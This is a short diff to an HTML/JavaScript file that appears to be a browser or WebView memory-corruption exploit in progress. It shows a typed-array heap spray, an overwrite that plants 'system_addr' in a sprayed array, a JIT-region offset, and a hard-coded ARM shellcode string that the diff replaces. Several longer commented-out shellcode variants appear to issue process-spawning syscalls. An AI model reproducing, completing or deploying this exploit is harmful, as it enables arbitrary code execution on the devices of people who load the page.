--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start6");
+alert("start6777");
 var flag=prompt("flag");
 if(flag!=0){
  
@@ -178,7 +178,7 @@ spray[spray_index][typedarray_index+0x100/4]=system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x87\xB0\x00\x22\x06\x92\x05\x90\x04\x91\x03\x92\x54\xF8\x28\x4C\x06\x20\x07\xB0\x70\x47";
+var shellcode="\x1c\xd0\x4d\xe2\x00\x20\xb0\xe3\x18\x20\x8d\xe5\x14\x00\x8d\xe5\x10\x10\x8d\xe5\x0c\x20\x8d\xe5\x28\x40\x14\xe5\x06\x00\xb0\xe3\x1c\xd0\x8d\xe2\x1e\xff\x2f\xe1";
  //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfc\xff\xff\x0a\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x30\x10\x9f\xe5\x00\x00\x81\xe5\x2c\x00\x9f\xe5\x2c\x10\x9f\xe5\x2c\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x24\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x04\x02\x00\x50\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50\x08\x02\x00\x50"
     //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfc\xff\xff\x0a\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x20\x00\x9f\xe5\x20\x10\x9f\xe5\x20\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50"
     //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xbe\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x50\xe3\xfe\xff\xff\x0a\x60\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x40\x70\xa0\xe3\x00\x00\xa0\xe1\x34\x10\x9f\xe5\x00\x00\x81\xe5\x30\x00\x9f\xe5\x30\x10\x9f\xe5\x30\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x28\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x00\x02\x00\x50\x04\x02\x00\x50\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50\x08\x02\x00\x50";
